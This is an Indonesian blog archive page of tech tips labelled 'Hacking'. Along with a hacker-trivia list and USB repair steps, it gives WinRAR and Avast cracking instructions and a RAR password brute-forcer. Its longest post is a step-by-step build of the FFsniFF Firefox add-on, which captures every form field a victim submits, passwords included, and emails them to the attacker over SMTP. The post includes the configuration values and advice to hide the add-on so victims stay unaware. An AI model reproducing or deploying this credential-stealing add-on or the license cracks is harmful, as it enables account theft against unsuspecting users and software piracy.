Feature news

Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

10 Fakta Tentang hacker Di Dunia

Anda pengen punya website sendiri ??

untuk usaha, kantor, perusahaan, sekolah, pesantren atau instansi Anda ???
Kami solusinya. Tersedia berbagai paket dan harga :
1. Paket Web Personal. Harga Mulai Rp. 250.000,00
2. Paket Web Toko Online. Harga Mulai Rp. 500.000,00
3. Paket Web Pesantren. Harga Mulai Rp. 500.000,00
4. Paket Web Perusahaan ( Company Profile ). Harga Mulai Rp. 1.000.000,00
5.Paket Web Sekolah . Harga Mulai Rp. 1.000.000,00

Untuk Pemesanan hubungi 0877 95 400 942

 

Berikut ane share 10 Fakta Tentang hacker Di Dunia ..moga bermanfaat..

1.Apple freiPhone
Dari bluebox buatan sendiri yang digunakan untuk memanipulasi jalur telepon (phreaking), "Berkeley Blue" dan "Oak Toebark" memperoleh dana segar untuk mengembangkan komputer pertama mereka pada tahun 1970-an. Mereka adalah Steve Jobs dan Steve Wozniak. Bluebox sebenarnya ditemukan oleh John "Captain Crunch" Draper yang membobol jalur telepon dengan alat sederhana yang terbuat dari sebuah bungkus cornflakes.

2. Paranoid Killer Game
Dalam film WarGames, David menjebol sebuah komputer milik pemerintah dan hampir memicu perang dunia ke-3. Pada 1983, film ini telah menimbulkan ketakutan terhadap hacker di AS. Dalam acara di statiun TV CBS, diperdebatkan apakah sebaiknya orang tua melarang anak-anak mereka untuk berhubungan dengan dunia luar melalui PC. Beberapa koran menampilkan artikel yang menganjurkan orang tua mengunci modem dalam sebuah safebox, layaknya sebuah senjata.

3. Membobol Alat Transportasi (Bagian I)
Setelah berminggu-minggu memprogram, hacker asal Berlin berhasil membobol sistem sepeda motor sewa milik Geman Rail pada akhir 2003. Sang hacker menunjukan bagaimana ia dapat menggunakan motor secara gratis dengan menggunakan sebuah kode rahasia.

4. Membobol Alat Transportasi (Bagian II)
Januari 2008 sebuah trem keluar jalur di Lodz (Polandia). Seorang pemuda berusia 14 tahun telah memodifikasi sebuah remote TV yang dapat mengatur perpindahan kereta melalui infa merah. Ia menggunakan trem yang menjadi moda favoritnya sebagain model kereta.

5. Belum Ada Undang-Undangnya
Juli 1981, hacker pertama ditahan di AS karena telah berkali-kali menerobos komputer milik Menteri Pertahanan AS. Lantaran belum ada undang-undangnya, Pat "Captain Zap" Riddle dipenjara atas tuduhan mencuri barang dan layanan telepon. Orang pertama yang dituntut dengan undang-undang "Computer Fraud and Abuse Act" yang berlaku sejak tahun 1986 adalah pencipta worm Robert "rtm" Morris pada tahun 1990

6. Logo "Resmi" Hacker
"Glider', figur yang diambil dari dunia matematika "Conway's Game of Life", menjadi logo hacker resmi. Logo ini dibuat dalam format ASCII. Ada banyak hacker yang mengenakan t-Shirt dengan logo tersebut. Sebagaian malah membuatnya sebagai tato.

7. Hack Bernilai Miliaran Dolar
Hacking paling "mahal" sepanjang zaman terjadi pada April 2009, ketika orang tidak dikenal mencuri beberapa terabyte data-data pengembangan jet tempur "F-35 Lightning II' dari komputer milik Pentagon. Program persenjataan AS paling mahal ini bernilai 300 miliar dolar.

8. Hacker AntiOscar
Pada tahun 2008, hacker menganugerahkan Pwine Award kepada McAfee sebagai "produsen yang paling memalukan". Perusahaan ini memberikan sertifikasi "Hacker Safe" pada website-website yang memiliki celah keamanan Cross Site Scripting. Setelah diketahui mereka kemudian menyangkalnya.

9. Penemu yang Jujur
Pada tahun 1984, pendiri Chaos Computer Club, Wau Holland (tahun 2001) menunjukan celah-celah dalam layanan online BTX. Dengan bermodalkan data-data bank milik pengguna yang tersimpan dalam sistem, ia "mengeruk" uang senilai 135.000 Mark, tetapi kemudian dikembalikannya ke pihak bank.

10. Istilah
Pada 1960-an, mahasiswa Massachusett Institute of Technology memberi julukan "hacker" kepada rekan-rakan mereka yang pintar mengoptimalkan program. Saat ini, istilah tersebut justru digunakan untuk pencuri data, yang sebenarnya disebut "kracker"



Learn more »

Cara Mengatasi USB Write Protected

Anda pengen punya website sendiri ??

untuk usaha, kantor, perusahaan, sekolah, pesantren atau instansi Anda ???
Kami solusinya. Tersedia berbagai paket dan harga :
1. Paket Web Personal. Harga Mulai Rp. 250.000,00
2. Paket Web Toko Online. Harga Mulai Rp. 500.000,00
3. Paket Web Pesantren. Harga Mulai Rp. 500.000,00
4. Paket Web Perusahaan ( Company Profile ). Harga Mulai Rp. 1.000.000,00
5.Paket Web Sekolah . Harga Mulai Rp. 1.000.000,00


Untuk Pemesanan hubungi 0877 95 400 942

Seringkali media tempat penyimpanan dari flashdisk, ada yang memiliki fasilitas write protected dan ada pula yang tidak memiliki fasilitas tersebut, berbeda dengan media tempat penyimpanan pada SDHC yang memang selalu ada fasilitas untuk write protected. Fasilitas ini sangat berguna untuk mengindari virus masuk ke media tempat penyimpanan maupun mengurangi resiko kehilangan data. Namun apabila write protected diaktifkan, maka flashdisk atau media tempat penyimpanan tersebut tidak dapat digunakan untuk merubah, menghapus dan menambah data. Cara untuk menghilangkan atau membuka write protected pada flashdisk tersebut untuk yang memiliki fasilitas write protected tinggal menggeser pada switch write protected dari on ke off. Sedangkan yang tidak memiliki fasilitas tersebut namun mengalami kondisi seperti write protected maka untuk mengembalikan flashdisk yang write protected adalah sebagai berikut.

Sebelum ke langkah bagaimana untuk mengatasi flashdisk yang write protected, perlu diketahui bahwa penyebab kenapa flashdisk tersebut write protected tentu berbeda-beda, bahkan terkadang untuk mengatasi write protected pada setiap flashdisk berbeda-beda berdasarkan merk flashdisk tersebut. Flashdisk yang mengalami hal yang seperti ini, apabila data dari flashdisk dirubah maka akan muncul peringatan "The disk is Write Protected". Tidak hanya itu saja, namun juga flashdisk ini tidak dapat diformat, apabila diformat akan muncul peringatan yang sama yaitu "The disk is Write Protected". Untuk mengatasi hal tersebut ada beberapa cara diantaranya;
Cara yang pertama
1. Buka Run pada windows atau tekan Windows + R pada keyboard
2. Isikan pada field yang kosong dengan regedit kemudian enter
3. Cari HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ StorageDevicePolicies(kemungkinan di beberapa OS tidak dijumpai StorageDevicePolicies)
4. Pada sisi sebelah kanan akan ada DWORD bernama WriteProtect. Klik 2x pada DWORD tersebut dan ubah value-nya dengan 0
5. Klik OK kemudian restart komputer.

Cara yang kedua
1. Buka Command Prompt Windows dengan cara buka run dan isi dengan cmd dan ketik CHKDSK /F Drive letter: (contoh apabila flashdisk berada di drive G maka chkdsk /f g
2. Setelah selesai, coba untuk membuat folder baru pada Flash Disk tersebut, apabila berhasil, maka folder baru tersebut akan tersimpan di flashdisk walaupun flashdisk tersebut tidak tersambung pada komputer sekalipun.
3. Apabila masih gagal, coba ulangi format dengan perintah Format Drive letter: (contoh apabila flashdisk berada di drive G maka format g
4. Atau dapat dilakukan melalui Computer Management dan lihat volume drive flash disk yang akan diformat, kemudian format. Bila masih error, coba restart komputer.

Cara yang ketiga
1. Buka windows Explorer, Klik kanan pada Drive Flash disk yang write protected kemudian klik “eject”,
2. Cabut Flash disk tersebut tanpa Safely remove,
3. Pasang kembali Flash Disk tersebut.
Apabila Flashdisk masih write protected, ulangi langkah 1-3, (kadang cukup sekali, kadang beberapa kali bahkan puluhan kali lebih).

Cara yang keempat
1. Pakai application OnBelay
2. Trus Instal dan jalankan (Serial Number ga usah diisi alias TRIAL)
3. Tentukan drive mana yg mo diformat




4. Lalu pilih menu Format,seperti gambar berikut



5. Pilih format QUICK ERASE trus centang "Display Sumarry When Finished"



6. Kalo udh cabut flashdisk agan trus colokin lagi.

Selamat Mencoba , Semoga Berhasil


Learn more »

Program Jahat Menyamar Jadi Antivirus

Sebuah varian program jahat atau malware baru mencoba menipu pengguna dengan menyamar menjadi komponen antivirus Trend Micro. Program jahat tersebut bekerja sebagai aplikasi Bitcoin miner yang menghasilkan uang bagi pembuatnya. 


Dilansir dari The Next Web, Sabtu (8/12/2012), program jahat yang menyamar sebagai aplikasi keamanan bukanlah sesuatu yang baru. Namun kombinasi antara penyamarannya dengan Bitcoin miner membuatnya menjadi hal baru. Trend Micro mendeteksi program jahat tersebut sebagai TROJ_RIMECUD.AJL. 

Taktik yang digunakna oleh penjahat cyber dalam kasus tersebut sangat sederhana. Mereka memancing pengguna agar menjalankan aplikasi dengan cara meyakinkan bahwa file tersebut berasal dari produk Trend Micro. Ketika pengguna mengaktifkan program jahat itu, akan tercipta proses svchost.exe (sama dengan proses yang dilakukan Windows untuk layanannya). Proses tersebut akan digunakan untuk mengunduh paket komponen berbahaya ke dalam PC pengguna. Paket inilah yang mengandung Bitcoin miner dengan nama HKLT_BITCOINMINE. Bitcoin tersebut adalah mata uang digital yang saat ini banyak digunakan sebagai alternatif dari bentuk umum uang. Karena tidak ada pembuat utama untuk mata uang ini, maka tidak ada kekuasaan yang mengaturnya dan tidak ada cara untuk mengunci seorang pengguna atau negara dari jaringan Bitcoin.

Mau Kursus Buat Web ???1 Hari Bisa Buat Web SendiriHarga Mulai Rp. 150.000Bisa kursus Online !!Mau ??Hubungi 0877 95 400 942
Learn more »

cara mengembalikan hp nokia yang lupa passwordnya

Alhamdulillah akhirnya bisa blogging lagi friends, 95% postingan diblog getrik ini ane tulis bedasarkan kasus yang ane hadapi,kadang juga kasus/permasalahan temen,saudara dan orang terdekat yang mereka minta bantuan judulnya ke ane dan smua solusi yang ane temui ane rangkum and ane share di blog getrik ne. so jangan khawatir dan ragu buat pratiknya.



"Allah tidak membebani seseorang melainkan sesuai dengan kesanggupannya. ia mendapat pahala (dari kebajikan) yang diusahakannya dan ia mendapat siksa (dari kejahatan) yang dikerjakannya.... " ( Q.S. Al-Baqoroh : 286 )

Ayat diatas yang memotivasi ane tuk terus cari solusi dari permasalahan yang ada  and Alhamdulillah disetiap permasalahan yang ada selalu memberikan ilmu baru yang tak terduga.

Kembali ke judul......!!!
Ceritanya baru saja, kakak ane mengalami kesulitan karena HP Nokia miliknya ( dia lupa typenya) tidak bisa dibuka dengan password yang biasa dia pakai, kenapa yach??? ane sendiri juga bingung kenapa bisa gitu,Alhasil itu HP tidak bisa dioperasikan, bahkan tidak bisa masuk ke menu utama, udah coba masukin password yang dia buat tetap tidak bisa..

Akhirnya jalan searching kesono kemari pun ane tempuh and akhir berhasil seperti semula tu Hp bisa dipakai, And berikut langkahnya :
  1. Copot Sim card pada HP
  2. Buka baterai, disana ada nomor IMEI (terletak di krangka HP tempat meletakkan baterai), catat jangan sampe lupa!
  3. Buka situs http://nfader.su/
  4. Kemudian masukkan nomor IMEI tadi ke kolom enter IMEI, centang pada tulisan I'm legal owner of the phone with that IMEI
  5. Klik Generate, maka anda akan mendapatkan Security Master Code
  6. Nah, hidupkan HP anda kemudian masukkan Security Master Code untuk membuka HP anda.
  7. Tunggu setelah 120 detik, maka Password anda akan dikembalikan ke default password yaitu 12345


Artinya, Security Master Code hanya dipakai untuk mengembalikan ke password setting awal, setelah 120 detik HP anda yang terkunci bisa dibuka dengan password default, yaitu 12345

Semoga Bermanfaat............

Mau Kursus Buat Web ???

1 Hari Bisa Buat Web Sendiri

Harga Mulai Rp. 150.000

Bisa kursus Online !!

Mau ??

Hubungi 0877 95 400 942

Learn more »

Cara cari refrensi

Refrensi bagi seorang penuntut ilmu itu wajib menurut yang punya blog ini, karena dengan refrensi or acuan kita bisa memandang suatu permasalah dari berbagai pandangan sisi dan aspek.Cara menghadapi dan menyelesaikan permasalahan, pekerjaan atau apalah namanya semakin cepat dan bisa dipertanggung jawabkan. Permasalahannya adalah bagaimana kita bisa mendapatkan refrensi itu yang pas, pas sama apa yang kita cari or hadapi and pas sama kantong kita alias duit yang kita punya.


Kali ini ana akan sedikit berbagai kepada pengunjung yang baik hati dan tidak sombong (^_^), bagaimana mendapatkaan refrensi yang sesuai dengan keinginan dan gratis bin majanan bin gak bayar.

Syarat dan ketentuan praktek :
  1. Tersambung dengan internet (conect)
  2. Refrensi yang dicari adalah refrensi/acuan/artikel tidak menyimpang dan pastikan bahwa refrensi tsb bermanfaat

Berikut cara cepat cari refrensi :
1. Baca "Bismillah"
2. Buka browser ( Mozilla Firefox, Internet Explorer, Opera, dll)
3. Pastikkan anda memakai serch engine google (www.google.com)
4. Ketikkan nama refrensi yang mau dicari dan diakhiri dengan ekstensi or jenis file yang mau dicari (pdf, doc, docx, ppt, pptx, xls dll).
contoh : sistem informasi.pdf

5. Pilih link pertama dari hasil pencarian kita di google
6. maka akan tampil tawaran download bagi yang pakai IDM seperti gambar berikut :
7. klik start download dan jika laptop anda belum terinstall IDM maka akan langsung ke-download,

Bagaimana cara mencari refrensi yang terkait dengan file diatas ??
Berikut caranya :

1. Potong alamat download sampai warna biru pada gambar diatas (nama file jangan diikutkan alias dibuang ) 
misal : http://wsilfi.staff.gunadarma.ac.id/Downloads/files/1004/Konsep+SI.pdf 
maka yang kita ambil adalah (tanpa nama file) : http://wsilfi.staff.gunadarma.ac.id/Downloads/files/1004/
2. hasil pemotongan tsb paste ke addres bar browser kita
3. berikut hasilnya, maka anda siap mengunduh or download refrensi terkait bahkan lebih banyak lagi.
Semoga bermanfaat 
 
4. Baca "Alhamdulillah"

note : jika belum paham bisa tinggalin comment dibawah akan kami jawab sesegera mungkin. atau email ke iont_5h@yahoo.com
Jangan di buka:
Learn more »

Cara mengatasi windows blank pada windows 7

Cara or trik ini ana temukan saat laptop punya shobat ana  error and dia minta tolong ke ana untuk jadi dokternya and itu dah menjadi rutinits saat laptop dia error.

Ini daftar error yang yang dialami laptop shobat ana ( merk axio neon OS Win 7 Profesional ) :
1. Booting lama
2. Start Up lama
3. Desktop tidak tampil alias hank and warna biru
4. Taskmanager disable
5. Semua tombol keyboard tidak berfungsi ( pas tampilan desktop hang )

Syarat dan ketentuan praktek :
1. Baca "Bismillah" saat memulai
2. OS yang digunakan dalam masalah ini terinstall Win 7 Profesional ( pd versi Win 7 lainnya kemungkinan besar trik di blog ini InsyaAllah masih bisa dipakai )
3. Siapkan secangkir copi bagi yang suka copi
4. Baca "Alhamdulillah" ketika kelar

Berikut cara mengatasi permasalahan Desktop hang pada Win 7 dengan dengan kasus seperti diatas :
  1. Nyalakan PC / Laptop , atau restart jika PC/Laptop anda dalam keadaan hang
  2. Tekan [F8] sebelum tampilan Windows 
  3. Maka akan muncul pilihan cara masuk ke windows, pilih "Repair Computer" kemudian [enter] untuk melanjutkan.
  4. Pada jendela "System recovery Options" pilih bahasa yang akan digunakan, secara default bahasa yang digunakan adalah English (US), dan pada "Select Keyboard Input Method" pilih US. [Next] untuk melanjutkan .
  5. Pilih User,dan isikan Password. [Ok]
  6. Jendela "Choose a recovery tool" akan muncul dan pilih "System Restore" akan tampil jendela restore point dan pilih tanggal yang pada saat PC/Laptop anda dalam keadaan fix. klik [Ok]
  7. Tunggu dengan sabar PC/Laptop anda dalam proses restore, setelah selesai di restart and nikmati hasil dari praktek ini.

Semoga membantu, jika cara ini belum berhasil juga anda bisa menghubungi kami, insyaAllah kami akan membantu Anda semampu kami.

GOOD LUCK
Thanks for My Shob, karena laptopmu yang sering error bisa menjadi tambahan ilmu buatku untuk menyelesaikannya.
 
:
Learn more »

Cara Copy Paste artikel dari web yang terkunci ( diprotect )

Hari ini lumayan produktif dibanding hari sebelumnya,dalam sehari dah bisa 2 postingan asli ketikkan sendiri kekurangan dan kelebihan software instant dalam web desain dan daftar tools web desain plus sekarang ana mau share tentang Copas artikel dari web yang diprotect. Awal dari trik yang ana temukan ini pada saat searching artikel tentang "Membuat Form Pendaftaran Mahasiswa Baru dengan PHP dan MySQL" di halaman web tersebut dijelas step by stepnya plus scriptnya tapi disayangkan banget halaman tersebut diprotect jadi ana tidak bisa copas, karena kepepet ana cari akal,dari googling sampai cara tradisional yaitu oprek si browser. Alhamdulillah akhirnya ketemu and sekarang ana mau share.


Syarat dan ketentuan praktek :
  1. Membaca Bismillah sebelum memulai
  2. Browser yang digunakan adalah Mozilla Firefox
  3. Artikel yang mau di COPAS adalah artikel yang bener 2 dibutuhkan dan tidak ada di web lain atau susah nyarinya.
  4. Mohon ijin kepada sang pembuat artikel dengan meninggalkan comment di web tersebut
  5. Tidak mengatas namakan buatan sendiri, alias mencantumkan sumber asli jika mau di RePost
  6. Artikel yang dicari bukan artikel2 yang keluar dari koridor agama, masih seputar ilmu pengetahuan dll, 
  7. Resiko terhadap Penyalah gunaan trik dari blog ini ditanggung sendir, 
  8. Mambaca Alhamdulillah jika telah berhasil


Setelah Membaca Syarat dan ketentuan diatas,saatnya beraksi :
  1. Cari target web yang halamannya dikunci or diprotect misal : disini
    (maaf webnya ana pakai gan )
  2. Pada menubar Mozilla Firefox pilih Tools >> Options >> pilih tab "content" ( gambar disamping sebelum di lakukan perubahan )
  3.  Hilangkan tanda ceklist seperti gambar berikut :

     4. refresh halaman web yang diprotect and nikmati hasilnya
     5. Untuk mengembalikan ulangi langkah nomor 2 dan kembalikan ceklist seperti semula
     6. Good luck
Learn more »

Winrar 3.91 (x32 dan x64) | Download winrar full version

Ne trik tuk agan-agan yang benci ma program or software trial. Bisa dijalankan di OS system 32Byte ato yang 64 Byte. Caranya simple bi  mudah og gan, so jangan khawatir kalo agan g bisa ngikuti nie trik ok. tanpa basa-basi nie ana kasih triknya :

1. download Winrar.exe dulu, ne tuk yang OS x32Byte and ne yang OS x64Byte
2. Install hasil download-nya gan
3. setelah di install download yang buat cracknya gan, disini
4. copy hasildownloadan no.3 di sini "C:\Program Files\WinRAR"




semoga bermanfaat gan...
Download satu paket file-file diatas di bawah ini



DOWNLOAD
Learn more »

AVAST | Cara setting Avast sampai 2050

Nie trik bukan hoaxs bin nipu or palsu, ne beneran gan. Kita bisa setting avast mpe 2050 masa aktifnya. Trik ne ana temu ketika dah putus asa cari Anti Virus apa yag bagus + gratis + masa aktifnya lama, setelah googling beberapa hari and berdasarkan pengalaman ana memakai AV Avast beberapa bulan, ana putusin tuk ngangkat jempol ana buat AV Avast. Mantabs…awalnya ana dapet info dari temen ana Cuma sayang gan ana g boleh minta alias copas tu AV so ana googling j, eh ternyata ketemu and ne q mo share ma agan-agan sekalian yang budiman..

Berikut ne cara-caranya gan :

1.    Download Avast Pro atau Avast Internet Security (ana saranin yang avast internet security gan lebih lengkap ). download Avast Internet security disini.
2.    Install Avast Pro atau Avast Internet Security sebagai trial

3.    Buka avast, lalu Ke menu setting>Troubleshooting

4.    Hilangkan tanda centang pada Enable Avast! self-defense module

5.    Langkah selanjutnya download avast_6.0.license_zenix_2011_11_25.exe disini
6.    Jalankan avast_6.0.license_zenix_2011_11_25.exe
7.    Install seperti biasa..nanti anda akan di minta memasukkan password..
password nya:ZeNiX

8.     Setelah install selesai, nanti anda akan di minta restart PC, klik YES untuk restart

9.    Setelah restart, download AVAST 60 ZeNiX.reg disini , lalu jalankan AVAST 60 ZeNiX.reg

10.    Setelah registry telah di tambahkan, restart lagi PC anda..

11.    Silahkan cek license 2050 di Menu Maintenance>Subscription pada avast

Moga bermanfaat gan…..



Contohnya nie gan:

avast
Learn more »

Cara Membobol / Membuka password file rar dan zip di Windows

sebut saja RAR password remover sistem kerjanya sama halnya dengan RarCrack yang digunakan di linux. tetapi ada salah satu kekurang menurut saya dengan menggunakan software gratisan ini.
kekurangannya adalah "semakin banyak digit passwordnya, semakin lama mendapatkan passwordnya".


Cara menggunakan sangat mudah :
>> install
dahulu, lalu klik Open file RAR, kemudian klik tombol Start.

di Rar password remover ada Teknik yang disediakan : ada
Brute-force attack, Boost-Up attack dan memakai dictionary.

Teknik Brute-force attack yang paling mudah menurut saya hanya perlu setting panjang digit minimal dan maximal password, kemudian karakter apa saja yang perlu di search / dicari kalo kurang yakin contreng saja pilihan All printable symbols.
Kolom Start from harus diperhatikan, jangan sampai karakter password yang semestinya di search/cari gak jadi karena sudah terlanjur diset.
coba lihat screen shootnya :

RAR Password Remover
silahkan anda coba software ini,
download di :
WinRARPasswordRemover
Learn more »

Menjaring Password dengan Firefox Sniffer

Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semua addon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password pengguna ketika login ke email attacker, addon itu adalah FFsniFF.
Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.

Sekilas tentang addon Firefox
Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.
Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:
1
2
3
4
5
6
7
8
9
10
11
exampleExt.xpi:
/install.rdf
/components/*
/components/cmdline.js
/defaults/
/defaults/preferences/*.js
/plugins/*
/chrome.manifest
/chrome/icons/default/*
/chrome/
/chrome/content/
install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.
Membuat paket instalasi ffsniff.xpi
Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh file sumber FFsniFF dari http://azurit.elbiahosting.sk/ffsniff/. Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:
1
2
3
4
5
6
7
8
9
pkg_creator.py
src/
src/install.rdf
src/chrome/
src/chrome/content/
src/chrome/content/ffsniff/
src/chrome/content/ffsniff/ffsniffOverlay.xul
src/chrome/content/ffsniff/ffsniffOverlay_orig.js
src/chrome/content/ffsniff/contents.rdf
File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus diubah dan dibungkus menjadi paket zippy (xpi). Sebenarnya untuk membuat paket zippy sudah disediakan script pkg_creator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.
Setelah source berhasil didownload, berikutnya saya harus membuat file ffsniffOverlay.js, caranya adalah dengan mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:
1
2
3
4
5
6
7
var send_from_host = "";
var send_from = "";
var send_to = "";
var subject = "";
var smtp_host = "";
var smtp_port = "";
var enable_hide = "";
Konfigurasi smtp untuk @ilmuhacking.com
MX record ilmuhacking.com
MX record ilmuhacking.com
Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama, jadi smtp_host saya isi dengan ilmuhacking.com. Pada domain lain biasanya mail server adalah mail.domainanda.com.
send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).
enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.
smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.
1
2
3
4
5
6
7
var send_from_host = "ilmuhacking.com";
var send_from = "testing@ilmuhacking.com";
var send_to = "testing@ilmuhacking.com";
var subject = "Log Firefox Sniffer";
var smtp_host = "ilmuhacking.com";
var smtp_port = "25";
var enable_hide = "no";
Konfigurasi smtp untuk @telkom.net
Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke telkom.net.Dengan cara yang sama saya harus membaca MX record dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:
1
2
3
4
5
6
7
var send_from_host = "telkom.net";
var send_from = "rizki.wicaksono@telkom.net";
var send_to = "rizki.wicaksono@telkom.net";
var subject = "Log Firefox Sniffer";
var smtp_host = "mx1.mail.plasa.com";
var smtp_port = "25";
var enable_hide = "no";
Membuat file ffsniff.jar
Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:
content/ffsniff/contents.rdf
content/ffsniff/ffsniffOverlay.js
content/ffsniff/ffsniffOverlay.xul
Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.
ffsniff.jar list files
ffsniff.jar list files

Membuat file ffsniff.xpi
Setelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:
install.rdf
chrome/ffsniff.jar
Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Gambar di bawah ini menunjukkan ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.
ffsniff.xpi file list
ffsniff.xpi file list

Instalasi Firefox Sniffer
Oke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. Kini saya bisa menginstall addon tersebut. Cara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file xpi pada addressbar firefox. Setelah muncul daftar file di firefox, klik file xpi yang akan diinstall. Cara instalasi FFsniFF diperlihatkan pada gambar di bawah ini. Setelah berhasil install jangan lupa untuk restart firefox anda.
instalasi firefox sniffer
instalasi firefox sniffer
Mencoba login ke yahoo
Kini saya akan mencoba login ke yahoo dengan username rizkiwicaksono. Setelah login, saya periksa inbox email testing@ilmuhacking.com. Ternyata email hasil sniff password ketika login ke yahoo sudah masuk. Isi emailnya terlihat pada gambar di bawah ini.
log sniffer email
log sniffer email
Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua field dengan tag input (input type=”xxx”) dari form, yaitu: password field, hidden field, text field, checkbox. Selain itu FFsniff juga mencatat URL, nama field, jenis dan nilainya. FFsniFF hanya mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.
Email Sniffer Log
Mari kita perhatikan email yang dikirimkan FFsniFF. Header lengkap email yang dikirim FFsniff adalah sebagai berikut:
1
2
3
4
5
6
7
8
9
Return-path: 
Envelope-to: testing@ilmuhacking.com
Delivery-date: Fri, 27 Feb 2009 03:23:48 -0600
Received: from [202.43.xxx.xxx] (port=23982 helo=ilmuhacking.com)
by gator669.hostgator.com with esmtp (Exim 4.69)
(envelope-from )
id 1Lcywa-0002DK-Jj
for testing@ilmuhacking.com; Fri, 27 Feb 2009 03:23:48 -0600
Subject: Log Firefox Sniffer
Dalam email tersebut hanya ada 1 header Received, yaitu dari host 202.43.xxx.xxx (ip lengkap saya sensor). Hal ini menunjukkan bahwa smtp server yang saya pakai kebetulan adalah smtp server yang paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp server lain. Berikut ini adalah header email FFsniFF yang dikirim ke telkom.net:
Return-Path: 
Received: from [125.160.17.193] (HELO mx1.mail.telkom.net)
by f1.c.plasa.com (CommuniGate Pro SMTP 4.3.9)
with ESMTPS id 690188427 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:05:27 +0700
Received: from mx1.mail.plasa.com ([222.124.18.71])
by mx1.mail.telkom.net with esmtp id 1LeiKy-0001qP-O1
for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:04:20 +0700
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AggYAH+MrUnKK6ce/2dsb2JhbACBTosbIQGGVoIPsFshAQKSPQEDgSwG
X-IronPort-AV: E=McAfee;i="5300,2777,5542"; a="119895912"
Received: from xxxxdtp.net.id (HELO telkom.net) ([202.43.xx.xx])
by mx1.mail.plasa.com with ESMTP; 04 Mar 2009 11:02:49 +0700
Subject: Log Firefox Sniffer
X-HAM-Check: YES
